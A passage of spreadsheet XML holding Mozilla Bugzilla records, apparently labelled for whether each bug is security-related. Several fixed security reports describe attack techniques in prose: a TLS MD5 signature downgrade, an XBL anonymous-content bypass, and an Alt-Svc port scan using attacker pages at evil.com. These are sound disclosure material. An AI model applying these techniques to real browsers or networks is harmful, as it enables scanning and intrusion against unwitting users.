          <t>Calendar</t>
        </is>
      </c>
      <c r="J1508" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1508" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1508" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1508" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1508" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1508" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1508" t="inlineStr"/>
      <c r="Q1508" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1508" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1508" t="inlineStr">
        <is>
          <t>3.7</t>
        </is>
      </c>
      <c r="T1508" t="n">
        <v>1</v>
      </c>
      <c r="U1508" t="n">
        <v>0</v>
      </c>
      <c r="V1508" t="n">
        <v>9</v>
      </c>
      <c r="W1508" t="inlineStr">
        <is>
          <t>After the recent build changes the calendar mozmill tests are not running.
The paths still point to "$objdir$/mozilla/&lt;somedir&gt;" ISO "$objdir$/&lt;somedir&gt;"</t>
        </is>
      </c>
      <c r="X1508" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1509">
      <c r="A1509" t="n">
        <v>443089</v>
      </c>
      <c r="B1509" t="inlineStr">
        <is>
          <t>2008-07-01 20:05:47 -0700</t>
        </is>
      </c>
      <c r="C1509" t="inlineStr">
        <is>
          <t>&lt;mtd&gt; with huge rowspan causes crash with sad nsCellMap</t>
        </is>
      </c>
      <c r="D1509" t="inlineStr">
        <is>
          <t>2008-09-25 15:01:17 -0700</t>
        </is>
      </c>
      <c r="E1509" t="n">
        <v>1</v>
      </c>
      <c r="F1509" t="n">
        <v>1</v>
      </c>
      <c r="G1509" t="n">
        <v>3</v>
      </c>
      <c r="H1509" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1509" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1509" t="inlineStr">
        <is>
          <t>MathML</t>
        </is>
      </c>
      <c r="K1509" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1509" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1509" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1509" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1509" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1509" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1509" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1509" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1509" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1509" t="n">
        <v>1</v>
      </c>
      <c r="U1509" t="n">
        <v>0</v>
      </c>
      <c r="V1509" t="n">
        <v>38</v>
      </c>
      <c r="W1509" t="inlineStr">
        <is>
          <t>Created attachment 327731
testcase
Steps to reproduce:
1. Load the testcase in a debug build (Firefox trunk on Tiger).
Result:
Sometimes:
firefox-bin(17051,0xa000d000) malloc: *** error for object 0x339c001b: pointer being reallocated was not allocated
firefox-bin(17051,0xa000d000) malloc: *** set a breakpoint in szone_error to debug
###!!! ASSERTION: invalid array index: 'i &lt; Length()', file ../../dist/include/xpcom/nsTArray.h, line 317
Always, a crash at one of the following:
nsCellMap::AppendCell - nsTArray_base::EnsureCapacity
nsCellMap::SetDataAt - nsTArrayElementTraits&lt;CellData*&gt;::Construct&lt;CellData*&gt;
nsCellMap::AppendCell - CellData::IsOrig
All of the crashes involve non-null, bogus pointer dereferences.  For the first crash signature, this is easiest to see with:
export MallocScribble=1
export MallocPreScribble=1</t>
        </is>
      </c>
      <c r="X1509" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" t="n">
        <v>778603</v>
      </c>
      <c r="B1510" t="inlineStr">
        <is>
          <t>2012-07-29 18:33:55 -0700</t>
        </is>
      </c>
      <c r="C1510" t="inlineStr">
        <is>
          <t>Out of bounds read in str_unescape</t>
        </is>
      </c>
      <c r="D1510" t="inlineStr">
        <is>
          <t>2024-05-29 16:03:16 -0700</t>
        </is>
      </c>
      <c r="E1510" t="n">
        <v>1</v>
      </c>
      <c r="F1510" t="n">
        <v>1</v>
      </c>
      <c r="G1510" t="n">
        <v>3</v>
      </c>
      <c r="H1510" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1510" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1510" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1510" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1510" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1510" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1510" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1510" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1510" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q1510" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1510" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1510" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T1510" t="n">
        <v>1</v>
      </c>
      <c r="U1510" t="n">
        <v>0</v>
      </c>
      <c r="V1510" t="n">
        <v>13</v>
      </c>
      <c r="W1510" t="inlineStr">
        <is>
          <t>I ran into this issue while fuzzing.  ASAN reports this as a heap overflow.  I wasn't able to symbolize the ASAN output for some unknown reason.  However, I see it crashing at strange locations on different runs on optimized builds.
In debug builds, it hits this assertion and crashes @ NULL: 
Assertion failure: mLength + 1 &lt;= mReserved, at ./../../dist/include/js/Vector.h:788
Windbg references this code: mozjs!str_unescape+0x23e [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsstr.cpp @ 352]
I have attached some logs from both debug and optimized builds.</t>
        </is>
      </c>
      <c r="X1510" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1511">
      <c r="A1511" t="n">
        <v>790318</v>
      </c>
      <c r="B1511" t="inlineStr">
        <is>
          <t>2012-09-11 10:44:17 -0700</t>
        </is>
      </c>
      <c r="C1511" t="inlineStr">
        <is>
          <t>upload an attachment was failed "Error 403 : Forbidden" if json file has Japanese(Kanji) data</t>
        </is>
      </c>
      <c r="D1511" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E1511" t="n">
        <v>1</v>
      </c>
      <c r="F1511" t="n">
        <v>1</v>
      </c>
      <c r="G1511" t="n">
        <v>6</v>
      </c>
      <c r="H1511" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1511" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1511" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K1511" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1511" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1511" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1511" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1511" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1511" t="inlineStr"/>
      <c r="Q1511" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1511" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1511" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1511" t="n">
        <v>1</v>
      </c>
      <c r="U1511" t="n">
        <v>0</v>
      </c>
      <c r="V1511" t="n">
        <v>8</v>
      </c>
      <c r="W1511" t="inlineStr">
        <is>
          <t>Created attachment 660153
Edit addon - Add-on Builder - 2 screenshots
User Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1
Build ID: 20120905151427
Steps to reproduce:
I am trying to attach json file which have Japanese(Kanji) data.
Actual results:
upload an attachment was failed "Error 403 : Forbidden".
I tested 4 encordings "UTF-8 without BOM", "UTF-8 with BOM", "UTF-16 without BOM", "UTF-16 with BOM",
but failed all of them.
Expected results:
Add-on Builder should handle Japanese properly.</t>
        </is>
      </c>
      <c r="X1511" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" t="n">
        <v>1415687</v>
      </c>
      <c r="B1512" t="inlineStr">
        <is>
          <t>2017-11-08 14:02:28 -0800</t>
        </is>
      </c>
      <c r="C1512" t="inlineStr">
        <is>
          <t>Dont show browser toolbars until the new page starts loading</t>
        </is>
      </c>
      <c r="D1512" t="inlineStr">
        <is>
          <t>2017-11-23 01:19:11 -0800</t>
        </is>
      </c>
      <c r="E1512" t="n">
        <v>1</v>
      </c>
      <c r="F1512" t="n">
        <v>1</v>
      </c>
      <c r="G1512" t="n">
        <v>2</v>
      </c>
      <c r="H1512" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1512" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1512" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K1512" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1512" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1512" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1512" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1512" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1512" t="inlineStr"/>
      <c r="Q1512" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1512" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1512" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1512" t="n">
        <v>1</v>
      </c>
      <c r="U1512" t="n">
        <v>0</v>
      </c>
      <c r="V1512" t="n">
        <v>10</v>
      </c>
      <c r="W1512" t="inlineStr">
        <is>
          <t>based off of some feedback on Reddit. 
When browsing a webpage with the toolbars hidden. Tapping a link does the following
1) Toolbars show
2) content insents of the webview changes causing the link you just tapped to move
3) The next page loads
We should instead do
1) load the next page
2) show the toolbars
If the toolbar is shown after the page starts to refresh the jank of the web content does not occur.</t>
        </is>
      </c>
      <c r="X1512" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1513">
      <c r="A1513" t="n">
        <v>1158489</v>
      </c>
      <c r="B1513" t="inlineStr">
        <is>
          <t>2015-04-25 07:54:14 -0700</t>
        </is>
      </c>
      <c r="C1513" t="inlineStr">
        <is>
          <t>Prevent MD5 Downgrade in TLS 1.2 Signatures</t>
        </is>
      </c>
      <c r="D1513" t="inlineStr">
        <is>
          <t>2017-08-09 15:08:02 -0700</t>
        </is>
      </c>
      <c r="E1513" t="n">
        <v>1</v>
      </c>
      <c r="F1513" t="n">
        <v>1</v>
      </c>
      <c r="G1513" t="n">
        <v>3</v>
      </c>
      <c r="H1513" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1513" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1513" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1513" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1513" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1513" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1513" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1513" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1513" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q1513" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1513" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1513" t="inlineStr">
        <is>
          <t>3.21</t>
        </is>
      </c>
      <c r="T1513" t="n">
        <v>1</v>
      </c>
      <c r="U1513" t="n">
        <v>0</v>
      </c>
      <c r="V1513" t="n">
        <v>95</v>
      </c>
      <c r="W1513" t="inlineStr">
        <is>
          <t>Created attachment 8597619
Report on exploiting hash collisions in TLS
Since 2011 (Bug 650355), NSS was supposed to "stop accepting MD5 as a
hash algorithm in signatures".  While this applies to signatures
within certificates, NSS still allows MD5 signatures in the server
signature in the TLS 1.2 ServerKeyExchange message. This exposes NSS
based clients such as Firefox to theoretical collision-based forgery
attacks. More pragmatically, we believe it is important to draw
attention to this bug before TLS 1.3 is implemented, because a similar
bug in the processing of the TLS 1.3 ServerCertificateVerify message
would lead to a serious server impersonation attack.
To see the bug, connect with Firefox to an openssl 1.0.1m server with
a modified ssl/s3_srvr.c (attached) which always signs the
ServerKeyExchange with RSA-MD5.  When Firefox connects to a server,
its signature algorithms extension only advertises the following
signature/hash algorithms: SHA256/RSA, SHA384/RSA, SHA1/RSA,
SHA256/ECDSA, SHA384/ECDSA, SHA1/ECDSA, SHA256/DSA, SHA1/DSA. Notably,
it should not allow any MD5 signature. However, when our server sends
it an RSA-MD5 signature, NSS does not check that this algorithm is
included in the allowed algorithms and quietly accepts it.
The root cause for this bug is that TLS 1.2 allows the signer to
choose any combination of signature and hash algorithm (even ECDSA-MD5
if it so wishes) and it is up to the verifier to check that the
algorithm is acceptable.  This is a change from TLS 1.1 (which only
allowed MD5SHA1); notably the current TLS 1.3 draft also allows MD5
signatures.
We note that NSS allows any signature/hash algorithm combination in
ServerKeyExchange but in the ClientCertificateVerify it forces the
client to use the hash algorithm that will be used in the Finished
message (SHA-256 for TLS 1.2, MD5SHA1 for TLS 1.1) again ignoring the
signature algorithms extension. We anticipate that a future update to
NSS would also generalize the client signature (to support SHA-512,
for example); and this report warns that any such update should be
careful to avoid MD5 downgrades.
The impact of the bug depends on whether an adversary can trigger
meaningful collisions in TLS client and server signatures. Folklore
about TLS has previously suggested that only second preimage attacks
"break" TLS signatures, collisions do not. We attach a draft research
report that shows that collision resistance is essential for the
security of client and server signatures in TLS. We show how
chosen-prefix collisions in the hash function can be used to forge
client signatures in TLS 1.2 and server signatures in TLS 1.3.
We believe this result is of independent interest. Collisions in
any of the handshake hashes in TLS can be translated to real
man-in-the-middle attacks.
We would be happy to provide further tests (such as a test server)
and discuss countermeasures. The straightforward fix is to check
that the signature/hash algorithm in the ServerKeyExchange message
is one of the algorithms sent in the ClientHello.</t>
        </is>
      </c>
      <c r="X1513" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1514">
      <c r="A1514" t="n">
        <v>911864</v>
      </c>
      <c r="B1514" t="inlineStr">
        <is>
          <t>2013-09-02 17:54:39 -0700</t>
        </is>
      </c>
      <c r="C1514" t="inlineStr">
        <is>
          <t>Using XBL scopes its possible to steal(clone) native anonymous content.</t>
        </is>
      </c>
      <c r="D1514" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:10 -0700</t>
        </is>
      </c>
      <c r="E1514" t="n">
        <v>1</v>
      </c>
      <c r="F1514" t="n">
        <v>1</v>
      </c>
      <c r="G1514" t="n">
        <v>3</v>
      </c>
      <c r="H1514" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1514" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1514" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K1514" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L1514" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1514" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1514" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1514" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1514" t="inlineStr">
        <is>
          <t>[uplift needs bug 822425][embargo until b2g18 EOL][qa-][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q1514" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1514" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1514" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T1514" t="n">
        <v>1</v>
      </c>
      <c r="U1514" t="n">
        <v>0</v>
      </c>
      <c r="V1514" t="n">
        <v>87</v>
      </c>
      <c r="W1514" t="inlineStr">
        <is>
          <t>Created attachment 798654
cloneAnon.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130814063812
Steps to reproduce:
I used an iframe with a data URL to load an XML file to get access to the observe function that xml pretty print bindings provide, I then used this function and some finagling to get fully anonymous content appended as a child of content that was accessible from the XML iframe.  This works because the observe function shares the scope with other anonymous content that might be provided with other bindings.  I believe its actually a cross-compartment wrapper bypass.  The interesting part is that once the anonymous content that is inaccessible is the child of content I can access, that cloneNode(true) clones that content and makes a fully accessible clone.  I cant help but reference my bug here:
https://bugzilla.mozilla.org/show_bug.cgi?id=817922
which points out way back then that this would probably come to pass.  Ill be CC'ing bholley on this one because i mentioned it to him some months back now, I just haven't had time at all lately to focus on security research and I'm even using my day off for labor day weekend to get this public ASAP.  I've also noticed that in the newest nightly these XUL elements I'm cloning have become HTMLDivElements.  I assume that change is to mitigate future problems like this, and maybe in those instances someone wouldn't even realize that they had gained access to native anonymous content.  As I've said I have very little time lately, so please fill in the blanks and correct me on what I'm wrong about here.  Thanks.
Actual results:
Using this technique I was able to clone an XUL element being provided as anonymous content from the pluginProblem.xml bindings.
Expected results:
The reference to the XUL element that can be obtained by using document.getAnonymousNodes/document.getAnonymousElementByAttribute should not allow itself to be appended to the content accessible from the XML iframe.</t>
        </is>
      </c>
      <c r="X1514" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1515">
      <c r="A1515" t="n">
        <v>1692899</v>
      </c>
      <c r="B1515" t="inlineStr">
        <is>
          <t>2021-02-15 10:55:03 -0800</t>
        </is>
      </c>
      <c r="C1515" t="inlineStr">
        <is>
          <t>RNP-01-003 WP3 Thunderbird: Possible race condition when reading from disk</t>
        </is>
      </c>
      <c r="D1515" t="inlineStr">
        <is>
          <t>2021-06-09 09:43:05 -0700</t>
        </is>
      </c>
      <c r="E1515" t="n">
        <v>1</v>
      </c>
      <c r="F1515" t="n">
        <v>1</v>
      </c>
      <c r="G1515" t="n">
        <v>3</v>
      </c>
      <c r="H1515" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1515" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J1515" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K1515" t="inlineStr">
        <is>
          <t>78</t>
        </is>
      </c>
      <c r="L1515" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1515" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1515" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1515" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1515" t="inlineStr"/>
      <c r="Q1515" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1515" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1515" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T1515" t="n">
        <v>1</v>
      </c>
      <c r="U1515" t="n">
        <v>0</v>
      </c>
      <c r="V1515" t="n">
        <v>11</v>
      </c>
      <c r="W1515" t="inlineStr">
        <is>
          <t>When processing a PGP-signed email, the signature data is extracted and written to the
filesystem before calling the RNP library, which in turn reads the signature data back
from the filesystem. This introduces a race condition due to the timing and predictable
file-path wherein a malicious local user can swap out the dumped file for a malicious
signature file. During this assessment, however, it was not possible to exploit this in any
meaningful way. The following shows a code excerpt that is responsible for writing the
file to disk before calling the RNP library.
***Affected File:***
comm/mail/extensions/openpgp/content/modules/mimeVerify.jsm
***Affected Code:***
~~~~~
onStopRequest() {
[...]
if (this.protocol === PGPMIME_PROTO) {
[...]
this.sigFile = EnigmailFiles.getTempDirObj();
this.sigFile.append("data.sig");
this.sigFile.createUnique(this.sigFile.NORMAL_FILE_TYPE, 0x180);
EnigmailFiles.writeFileContents(this.sigFile, this.sigData, 0x180);
if (!EnigmailDecryption.isReady(win)) {
return;
}
let sigFileName = EnigmailFiles.getEscapedFilename(
EnigmailFiles.getFilePath(this.sigFile)
);
let keyserver = EnigmailPrefs.getPref("autoKeyRetrieve");
let options = {
keyserver,
keyserverProxy: EnigmailHttpProxy.getHttpProxy(keyserver),
fromAddr: EnigmailDecryption.getFromAddr(win),
mimeSignatureFile: sigFileName,
};
const cApi = EnigmailCryptoAPI();
[...]
this.returnStatus = cApi.sync(cApi.verifyMime(this.signedData, options));
[...]
~~~~~
It is recommended to avoid using the filesystem in order to pass the signature
information to the library. Instead, the information should be passed via memory, as
done with the signed data itself.</t>
        </is>
      </c>
      <c r="X1515" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1516">
      <c r="A1516" t="n">
        <v>1552993</v>
      </c>
      <c r="B1516" t="inlineStr">
        <is>
          <t>2019-05-20 16:54:09 -0700</t>
        </is>
      </c>
      <c r="C1516" t="inlineStr">
        <is>
          <t>Extended Port Scanning with Alt-Svc on Firefox</t>
        </is>
      </c>
      <c r="D1516" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:35 -0700</t>
        </is>
      </c>
      <c r="E1516" t="n">
        <v>1</v>
      </c>
      <c r="F1516" t="n">
        <v>1</v>
      </c>
      <c r="G1516" t="n">
        <v>3</v>
      </c>
      <c r="H1516" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1516" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1516" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1516" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L1516" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1516" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1516" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1516" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1516" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main68+]</t>
        </is>
      </c>
      <c r="Q1516" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1516" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1516" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T1516" t="n">
        <v>1</v>
      </c>
      <c r="U1516" t="n">
        <v>1</v>
      </c>
      <c r="V1516" t="n">
        <v>23</v>
      </c>
      <c r="W1516" t="inlineStr">
        <is>
          <t>Created attachment 9066250
port-scan.png
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Steps to reproduce:
Contributors: Trishita Tiwari (me) and Prof. Ari Trachtenberg (my advisor, email: trachten@bu.edu) from Boston University.
General Description:
The HTTP Alternative Services header (Alt-Svc) implementation on the Firefox browser may be abused by an attacker to compromise security measures, for instance, to conduct extended port scanning. (Note that other attacks related to the Alt-Svc implementation on Firefox have been filed in separate reports, as indicated in the bugzilla guidelines)
To effect these compromises, an attacker need only have the victim visit a website under the attacker’s control (either as a first party or a third party through an image/iframe).  The attacker’s website specifies an Alt-Svc header that enables the various attacks in a manner that is not visible to the victim (i.e. URL and domain name visible in the browser are not affected).
Details on extended port scanning:
The Alt-Svc header may be leveraged to force an unwitting victim to scan all TCP ports of any host that the victim can access. This includes ports that Firefox marks as unsafe and are otherwise inaccessible through JavaScript, and hosts behind the victim’s firewall or even the victim’s localhost. The attack naturally lends itself to a stealthy distributed port scanning of a target from multiple victim browsers.
The basis of this attack is the observation that if a website specifies an Alt-Svc header to a secondary host with an HTTP2 endpoint, then Firefox immediately tries to initiate a TLS handshake with the secondary host, without performing any checks on the host or port (i.e., the secondary host could even be a private IP or localhost).
The port-scanning thus proceeds with the attacker creating a webpage (e.g., https://evil.com/p1) whose Alt-Svc is set to a target host and port. When the victim then visits this page, the victim’s browser parses the Alt-Svc value and attempts to initiate a connection to the target host on the specified port:
1. If the target port is in a closed state, the target immediately sends an RST packet to the browser and the browser registers the alternative service as broken. 
2. However, if the target port is in an open state, more packets are typically exchanged (e.g., ACKs) and the browser thus does not immediately know whether the Alt-Svc host is valid. 
To discern between these two possible states of the target port, the attacker then automatically redirects the victim to a second webpage on the same attacker host (e.g., https://evil.com/p2), but whose Alt-Svc host is under the attacker’s control (e.g., h2="moreevil.com"). Two cases emerge:
1. The browser has determined that the original Alt-Svc (i.e. the target host and port) is broken, and the redirect will produce an immediate connection to the secondary attacker site (moreevil.com) and can be logged by the attacker.
2. The browser has not yet determined that the original Alt-Svc is broken, and the redirect will not produce a connection to the secondary attacker site (moreevil.com).
In this way the attacker can infer whether the target port was open or closed, as illustrated in the attached figure.
Actual results:
Demo: We provide a demo website that implements this. The form on the landing page asks you to enter an IP/Port combination, (which defaults to localhost:25). To test it, you could open/close any port on a machine under your control to see if the port is reported as open or closed. We would like to note that since there is a time threshold involved for discerning an open vs closed port, the results will inherently include some noise. 
Demo link: 
http://trishita.ddns.net:9000/h2/ip-port-entry.html
Expected results:
Mitigation: Firefox might want to institute the same port blacklist for Alt-Svcs as it does for JavaScript.</t>
        </is>
      </c>
      <c r="X1516" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" t="n">
        <v>1569074</v>
      </c>
      <c r="B1517" t="inlineStr">
        <is>
          <t>2019-07-25 18:09:13 -0700</t>
        </is>
      </c>
      <c r="C1517" t="inlineStr">
        <is>
          <t>[lando-api] Lando presents the landing preview page with an approved sanitized commit message</t>
        </is>
      </c>
      <c r="D1517" t="inlineStr">
        <is>
          <t>2019-12-09 17:26:23 -0800</t>
        </is>
      </c>
      <c r="E1517" t="n">
        <v>1</v>
      </c>
      <c r="F1517" t="n">
        <v>1</v>
      </c>
      <c r="G1517" t="n">
        <v>7</v>
      </c>
      <c r="H1517" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1517" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1517" t="inlineStr">
        <is>
          <t>Lando</t>
        </is>
      </c>
      <c r="K1517" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1517" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1517" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1517" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1517" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1517" t="inlineStr"/>
      <c r="Q1517" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1517" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1517" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1517" t="n">
        <v>1</v>
      </c>
      <c r="U1517" t="n">
        <v>0</v>
      </c>
      <c r="V1517" t="n">
        <v>6</v>
      </c>
      <c r="W1517" t="inlineStr">
        <is>
          <t>After the `sec-approval` team has approved a Phabricator revision with a sanitized commit message, then a developer visiting Lando UI should see the approved sanitized commit message in the UI instead of the original commit message.
Rough notes:
* `PhabricatorClient` method to read a comment list?
* Function to pick the correct sanitized message out of the list of comments
  * Use transaction PHID from writing the sanitized message comment to pick the comment out of the comment thread
  * Acceptance test: older sanitized messages, approved or denied, should be ignored
  * Return HTTP 502 if Phabricator is down
* Possible UI changes to let the lander know they are not viewing the original commit message.</t>
        </is>
      </c>
      <c r="X1517" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" t="n">
        <v>1370522</v>
      </c>
      <c r="B1518" t="inlineStr">
        <is>
          <t>2017-06-06 06:24:30 -0700</t>
        </is>
      </c>
      <c r="C1518" t="inlineStr">
        <is>
          <t>Migrate Engagement Ratio ETL to python_mozetl</t>
        </is>
      </c>
      <c r="D1518" t="inlineStr">
        <is>
          <t>2017-07-07 10:27:38 -0700</t>
        </is>
      </c>
      <c r="E1518" t="n">
        <v>1</v>
      </c>
      <c r="F1518" t="n">
        <v>1</v>
      </c>
      <c r="G1518" t="n">
        <v>2</v>
